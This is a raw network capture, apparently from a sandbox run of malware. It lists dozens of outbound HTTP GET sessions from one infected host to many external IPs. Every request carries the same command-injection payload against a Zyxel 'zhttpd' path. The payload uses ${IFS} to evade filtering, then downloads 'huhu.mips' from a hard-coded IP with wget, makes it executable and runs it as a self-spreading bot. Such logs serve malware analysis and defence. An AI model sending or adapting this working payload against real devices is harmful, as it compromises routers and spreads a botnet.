                                            Feb 2, 2024 06:21:11.605947971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3999192.168.2.1533082119.17.174.75443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605984926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4000192.168.2.15516301.75.217.64443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606008053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4001192.168.2.1548352136.215.238.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606051922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4002192.168.2.154104089.132.67.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606095076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4003192.168.2.1534526144.10.75.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606138945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4004192.168.2.1544934143.195.254.210443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606148005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4005192.168.2.1535552156.108.96.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606179953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4006192.168.2.1542484190.77.101.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606219053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4007192.168.2.1545534205.18.47.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606251955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4008192.168.2.155321851.180.1.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606292963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4009192.168.2.1547670211.46.55.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606333017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4010192.168.2.153434654.163.205.234443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606362104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4011192.168.2.1559034185.112.68.248443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606389046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4012192.168.2.1557032165.94.177.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606448889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4013192.168.2.155616475.194.29.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606487036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4014192.168.2.154366458.153.26.230443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606514931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4015192.168.2.1553844201.118.74.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606551886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4016192.168.2.1559648156.143.99.250443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606606007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4017192.168.2.155391095.118.145.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606632948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4018192.168.2.1536950176.185.179.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606663942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4019192.168.2.153286241.240.197.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606686115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4020192.168.2.15525708.112.2.105443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606739998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4021192.168.2.1552204117.31.122.235443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606765032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4022192.168.2.153551272.180.48.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606807947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4023192.168.2.1546756130.17.93.200443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606833935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4024192.168.2.154637287.2.155.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606898069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4025192.168.2.156085239.68.193.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606935024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4026192.168.2.153844418.195.104.109443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.606952906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4027192.168.2.155620868.144.156.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607007980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4028192.168.2.154582238.149.235.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607060909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4029192.168.2.1548644163.91.130.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607094049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4030192.168.2.1546122191.160.66.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607146978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4031192.168.2.1533616183.169.29.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607184887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4032192.168.2.1552290191.99.71.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607225895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4033192.168.2.155693897.120.24.246443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607270956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4034192.168.2.1546326121.11.228.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607300043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4035192.168.2.153674214.34.205.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607352972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4036192.168.2.154051479.168.31.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607372999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4037192.168.2.1560408109.102.150.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607414007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4038192.168.2.1544874158.200.182.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607435942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4039192.168.2.154991074.229.194.26443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607466936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4040192.168.2.154565850.78.36.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607490063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4041192.168.2.15540089.189.54.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607537985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4042192.168.2.1536694213.83.245.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607580900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4043192.168.2.1536632198.212.255.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607629061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4044192.168.2.1551264162.124.184.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607661963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4045192.168.2.154653478.52.228.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607700109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4046192.168.2.155856027.179.208.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607728004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4047192.168.2.153458250.151.242.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607789040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4048192.168.2.1559172138.0.71.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607832909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4049192.168.2.1549302154.100.133.150443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607867002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4050192.168.2.154775623.191.24.149443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607903004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4051192.168.2.1550678156.16.254.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607953072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4052192.168.2.1540332117.100.3.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.607994080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4053192.168.2.1542458171.195.187.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608026028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4054192.168.2.154464681.128.123.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608074903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4055192.168.2.1559196220.101.177.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608103037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4056192.168.2.1548938151.29.162.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608140945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4057192.168.2.1533930148.52.208.59443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608187914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4058192.168.2.1538430164.17.154.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608217955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4059192.168.2.1547776177.118.243.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608249903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4060192.168.2.156098447.29.145.48443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608294010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4061192.168.2.1540332167.32.152.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.608345032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            4062192.168.2.1557350176.53.134.74443
                                            TimestampBytes transferredDirectionData
